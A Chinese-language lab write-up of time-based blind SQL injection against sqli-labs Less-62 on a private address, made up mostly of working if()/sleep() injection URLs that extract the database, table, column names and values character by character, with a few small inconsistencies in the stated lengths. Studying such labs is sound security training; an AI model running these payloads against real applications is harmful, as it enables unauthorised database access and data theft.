SQL注入自动化原理(盲注)

SQL注入自动化原理(盲注)

11/23/2020

雨 寒风刺骨

今天一下午都在研究bool盲注

Length（）函数 返回字符串的长度
Substr（）截取字符串
Ascii（）返回字符的ascii码
sleep(n)：将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

可使用burp suite进行fuzzing测试 测试哪些函数被过滤

布尔型：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据

爆数据库

数据库，也就是当前数据库，思路：数据库长度->根据长度判断每一位

数据库长度payload如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length(database())>n , sleep(3), 1) --+
其中，核心部分为length(database())>n，length()是求得长度，database()是获取当前数据库名称，那么length(database())，就是求得当前数据库的长度，使用if嵌套后，if(1,2,3)... 意思就是如果1成立，表达式结果为2，不成立，表达式结果为3，所以利用二分法，改变n的值以及n前面的符号（<,>,=），不断让length(database())和不同的数字比较大小，如果成立都会执行第二个语句，也就是sleep(3)

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length(database())>9 , sleep(3), 1) --+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length(database())>10 , sleep(3), 1) --+
不成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length(database())=10 , sleep(3), 1) --+
成立，长度为10

既然已经判断出了长度，就应该把每一位取出来（共10位），判断每一位大小

数据库名payload分析如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),a,b))=c,sleep(3),1)--+
其中，核心部分为ascii(substr((select database()),a,b))=c，select database()会返回查到数据库的名，外圈嵌套substr()截取函数，substr中参数a从1开始，表示从第一位开始截取，b从0开始表示截取长度，由于我们通常一位一位截取，所以b一般为1，因为很多数据库名，表名都是字母，字母之前比较很困难，所以将字母转成ascii码进行比较，就要用到ascii函数

第一位，先和100比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))>100,sleep(5),1)--+
浏览器没转圈，说明比100小，再和90比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))>90,sleep(3),1)--+
浏览器转圈，说明比90大，再和95比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))>95,sleep(3),1)--+
浏览器转圈，说明比95大，再和98比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))>98,sleep(3),1)--+
浏览器转圈，说明比98大，再和99比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))>98,sleep(3),1)--+
浏览器转圈，说明比98大，比100小，比98大，再和99做等号比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))=99,sleep(3),1)--+
至此为止，第一位拿下，第一位的ascii码为99，去acsii码表查看，值99对应的十进制为字符c，说明数据库第一位是c

以此类推，大家动手去判断一下，把公式中a从1到10，c也用刚刚的方法，每一位都判断一下，我这里的每一位结果如下
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),1,1))=99,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),2,1))=104,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),3,1))=97,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),4,1))=108,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),5,1))=108,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),6,1))=101,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),7,1))=110,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),8,1))=103,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),9,1))=101,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select database()),10,1))=115,sleep(3),1)--+
每一位都出来了，ascii码分别为
99 104 97 108 108 101 110 103 101 115
查找ascii码，对应的字符为
challenges
最后不忘在验证一下，从第一位到第十位全取出来，这次就不用ascii码了，直接和字符串比较，浏览器转圈了，数据库自然就是challenges
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(substr((select database()),1,10)='challenges',sleep(5),1)--+

爆表
已经知道了数据库名称，接下来该获取表的名称，思路：表个数->每张表的长度->根据每张表的长度判断每张表的每一位

表个数payload如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='challenges')=n,sleep(3),1)--+
其中，核心部分为select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='challenges')=n，
count(TABLE_NAME)是求得表个数，where TABLE_SCHEMA='challenges'当数据库名称为challenges时，其实也常这么用where TABLE_SCHEMA=database()，具体怎么用看你心情，也就是说求得标的个数，和n比较，通过改变n的值以及n前面的符号（<,>,=），不断让count(TABLE_NAME)和不同的数字比较大小，如果成立都会执行第二个语句，也就是sleep(3)

http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='challenges')<5,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='challenges')<3,sleep(3),1)--+
不成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='challenges')<2,sleep(3),1)--+
成立，比2小，那应该是只有1
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='challenges')=1,sleep(3),1)--+
表个数为1

既然已经判断出了表个数，就应该判断每一张表的长度

表长度payload分析如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length(select table_name from information_schema.tables where table_schema = database() limit a,b)=c,sleep(3),1)--+
其中，核心部分为limit a,b)=c，a从0开始，表示着第a+1张表开始，即a为0，就是第一张表开始，b一般取1，表示取几张，c就是最后比较的长度，那么，下面都代表第一张表的长度，是否小于15
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))<15,sleep(3),1)--+
浏览器转圈，说明比15小，再和10比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))<10,sleep(3),1)--+
浏览器没转圈，说明比10大或等于10，再和12比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))<12,sleep(3),1)--+
浏览器转圈，说明比12小，再和11比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))<11,sleep(3),1)--+
浏览器转圈，说明比11小，直接10比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))=10,sleep(3),1)--+
浏览器转圈，说明第一张表的长度为10
由于这里只有一张表，那么我们只做这第一张表的判断，往后，通过改变a的值（b就取默认为1不要变），来判断第2,3,4...表

把每一张表的每一位取出来（共1张表），判断每一位大小，也就是表名，这里和数据库名方法类似

表名payload分析如下

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,b),c,d))>n,sleep(3),1)--+
其中，核心部分为limit a,b),c,d))>n，b和d一般默认为1，a从0开始，表示着第a+1张表开始，即a为0，就是第一张表开始，c从1开始，表示着从表名的第一位开始，那么，下面都代表第一张表的第一位的ascii码，是否大于100
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>100,sleep(3),1)--+

第一位，先和100比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>100,sleep(3),1)--+
浏览器转圈，说明比100大，再和120比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>120,sleep(3),1)--+
浏览器没转圈，说明比120小，再和110比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>110,sleep(3),1)--+
浏览器没转圈，说明比110小，再和105比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>105,sleep(3),1)--+
浏览器转圈，说明比105大，再和107比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>107,sleep(3),1)--+
浏览器转圈，说明比107大，再和109比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))<109,sleep(3),1)--+
浏览器转圈，说明比109小，比109小，比107大，再和108做等号比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=108,sleep(3),1)--+
至此为止，第一位拿下，第一位的ascii码为108，去acsii码表查看，值108对应的十进制为字符l，说明第一张表的第一位是l

以此类推，大家动手去判断一下，把公式中c从1到10，因为本关只有一张表，所以a都是0，每一位都判断一下，我这里的每一位结果如下
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=108,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=114,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,1))=113,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),4,1))=112,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),5,1))=104,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1))=104,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),7,1))=114,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),8,1))=102,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),9,1))=107,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),10,1))=118,sleep(3),1)--+
每一位都出来了，ascii码分别为
108 114 113 112 104 104 114 102 107 118
查找ascii码，对应的字符为
lrqphhrfkv
最后不忘在验证一下，从第一位到第十位全取出来，这次就不用ascii码了，直接和字符串比较，浏览器转圈了，一张表名自然就是lrqphhrfkv
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,10))='lrqphhrfkv',sleep(3),1)--+

爆字段（列）
已经知道了表名称，接下来该获取字段的名称，思路：字段个数->每个字段的长度->根据每个字段的长度判断每个字段的每一位

字段个数payload如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(column_name) from information_schema.columns where table_name='lrqphhrfkv')=n,sleep(3),1)--+

其中，核心部分，和n比较，通过改变n的值以及n前面的符号（<,>,=），不断让count(column_name)和不同的数字比较大小，如果成立都会执行第二个语句，也就是sleep(3)

http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(column_name) from information_schema.columns where table_name='lrqphhrfkv')<10,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(column_name) from information_schema.columns where table_name='lrqphhrfkv')<5,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(column_name) from information_schema.columns where table_name='lrqphhrfkv')>3,sleep(3),1)--+
成立，比5小，比3大，那应该是只有4
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(column_name) from information_schema.columns where table_name='lrqphhrfkv')=4,sleep(3),1)--+
字段个数为4

既然已经判断出了字段个数，就应该判断每个字段的长度

字段长度payload分析如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit a,b)=c,sleep(3),1)--+
其中，核心部分为limit a,b)=c，a从0开始，表示着第a+1个字段开始，即a为0，就是第一个字段开始，b一般取1，表示取几个，c就是最后比较的长度，那么，下面都代表第一个字段的长度，是否小于5
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 0,1)<5,sleep(3),1)--+

第一个字段
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 0,1)<5,sleep(3),1)--+
浏览器转圈，说明比5小，再和3比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 0,1)<3,sleep(3),1)--+
浏览器转圈，说明比3小，再和2比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 0,1)<2,sleep(3),1)--+
浏览器转圈，说明比3小，比2不大
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 0,1)=2,sleep(3),1)--+
浏览器转圈，说明第一个字段的长度为2
第二个字段，通过改变a的值（b就取默认为1不要变），来判断第2,3,4...个字段
第二个字段
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 1,1)=6,sleep(3),1)--+
第三个字段
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 2,1)=11,sleep(3),1)--+
第四个字段
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name='lrqphhrfkv' limit 3,1)=4,sleep(3),1)--+

把每一个字段的每一位取出来（共4个字段），判断每一位大小，也就是字段名，这里和数据库名和表名方法类似

字段名payload分析如下

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit a,b),c,d))>n,sleep(3),1)--+
其中，核心部分为limit a,b),c,d))>n，b和d一般默认为1，a从0开始，表示着第a+1个字段开始，即a为0，就是第一个字段开始，c从1开始，表示着从字段名的第一位开始，那么，下面都代表第一个字段的第一位的ascii码，是否大于100

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>100,sleep(3),1)--+

第一位，先和100比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>100,sleep(3),1)--+
浏览器转圈，说明比100大，再和120比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>120,sleep(3),1)--+
浏览器没转圈，说明比120小，再和110比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>110,sleep(3),1)--+
浏览器没转圈，说明比110小，再和105比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>105,sleep(3),1)--+
浏览器没转圈，说明不小于105大，再和102比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>102,sleep(3),1)--+
浏览器转圈，说明比102大，再和104比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))>104,sleep(3),1)--+
浏览器转圈，说明比104大，不下雨105，再和105做等号比较
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))=105,sleep(3),1)--+
至此为止，第一位拿下，第一位的ascii码为105，去acsii码表查看，值105对应的十进制为字符i，说明第一张表的第一位是i

以此类推，大家动手去判断一下，把公式中a和c从往后推，我这里的最终结果如下

第一个字段（2位）
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,1))=105,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),2,1))=100,sleep(3),1)--+
ascii码分别为
105 100
对应的字符为
id
最后不忘在验证一下
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 0,1),1,2)='id',sleep(3),1)--+

第二个字段（6位）
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),1,1))=115,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),2,1))=101,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),3,1))=115,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),4,1))=115,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),5,1))=105,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),6,1))=100,sleep(3),1)--+
ascii码分别为
115 101 115 115 105 100
对应的字符为
sessid
最后不忘在验证一下
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 1,1),1,6)='sessid',sleep(3),1)--+

第三个字段（11位）
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),1,1))=115,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),2,1))=101,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),3,1))=99,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),4,1))=114,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),5,1))=101,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),6,1))=116,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),7,1))=95,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),8,1))=52,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),9,1))=88,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),10,1))=89,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),11,1))=48,sleep(3),1)--+
ascii码分别为
115 101 99 114 101 116 95 52 88 89 48
对应的字符为
secret_4XY0
最后不忘在验证一下
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 2,1),1,11)='secret_4XY0',sleep(3),1)--+

第四个字段（4位）
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 3,1),1,1))=116,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 3,1),2,1))=114,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 3,1),3,1))=121,sleep(3),1)--+
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 3,1),4,1))=121,sleep(3),1)--+
ascii码分别为
116 114 121 121
对应的字符为
tryy
最后不忘在验证一下
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(substr((select column_name from information_schema.columns where table_name='lrqphhrfkv' limit 3,1),1,6)='tryy',sleep(3),1)--+

爆值
已经知道了字段名称，接下来该获取字段的值，思路：字段值的个数（有多少条记录）->每个字段值的长度->每个字段值的每一位

字段值个数（有多少条记录）payload如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(*) from lrqphhrfkv)=n,sleep(3),1)--+
其中，核心部分，和n比较，通过改变n的值以及n前面的符号（<,>,=），让查找到的count(*)（记录个数）和不同的数字比较大小，如果成立都会执行第二个语句，也就是sleep(3)

http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(*) from lrqphhrfkv)<5,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(*) from lrqphhrfkv)<3,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(*) from lrqphhrfkv)<2,sleep(3),1)--+
成立，比2小，那应该是只有1
http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(*) from lrqphhrfkv)=1,sleep(3),1)--+
lrqphhrfkv表只有一条记录

值长度payload如下

公式模板
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select column from lrqphhrfkv limit a,b))=n,sleep(3),1)--+
其中，核心部分，和n比较，通过改变n的值以及n前面的符号（<,>,=），让查找到的column（上一步测出的字段名称）和不同的数字比较大小，如果成立都会执行第二个语句，也就是sleep(3)

http://192.168.239.138:86/Less-62/index.php/?id=1') and if((select count(*) from lrqphhrfkv)=1,sleep(3),1)--+

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select id from lrqphhrfkv limit 0,1))<5,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select id from lrqphhrfkv limit 0,1))<3,sleep(3),1)--+
成立
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select id from lrqphhrfkv limit 0,1))<2,sleep(3),1)--+
成立，比2小，那应该是只有1
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select id from lrqphhrfkv limit 0,1))=1,sleep(3),1)--+
id字段第一条记录长度为1

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select sessid from lrqphhrfkv limit 0,1))=32,sleep(3),1)--+
sessid字段第一条记录长度为32

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select secret_4XY0 from lrqphhrfkv limit 0,1))=24,sleep(3),1)--+
secret_4XY0字段第一条记录长度为1

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(length((select tryy from lrqphhrfkv limit 0,1))=2,sleep(3),1)--+
tryy字段第一条记录长度为2

既然已经判断出了字段值的长度，就应该判断每个值的每一位

把每一个值的每一位取出来（共4个值），判断每一位大小，也就是值，这里和数据库名，表名和列名方法类似

值payload分析如下

http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select column from lrqphhrfkv limit a,b),c,d))=n,sleep(3),1)--+
其中，核心部分为limit a,b),c,d))>n，b和d一般默认为1，a从0开始，表示着第a+1个字段值（记录）开始，即a为0，就是第一条记录开始，c从1开始，表示着从column对应的记录值的第一位开始，那么，下面都代表id字段第一条记录的第一位的ascii码，是否小于100
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select id from lrqphhrfkv limit 0,1),1,1))<100,sleep(3),1)--+

id值为
http://192.168.239.138:86/Less-62/index.php/?id=1') and if(ascii(substr((select id from lrqphhrfkv limit 0,1),1,1))=49,sleep(3),1)--+
至此为止，第一位拿下，第一位的ascii码为49，去acsii码表查看，值49对应的十进制为字符1，说明id值为1

以此类推，大家动手去判断一下，把公式中a和c从往后推，我这里的最终结果如下

substr

substr（）

Substr()和substring()函数实现的功能是一样的，均为截取字符串。

string substring(string, start, length)

string substr(string, start, length)

参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度

ASCII

返回字符串 s 的第一个字符的 ASCII 码。
返回 CustomerName 字段第一个字母的 ASCII 码：

SELECT ASCII(CustomerName) AS NumCodeOfFirstChar
FROM Customers;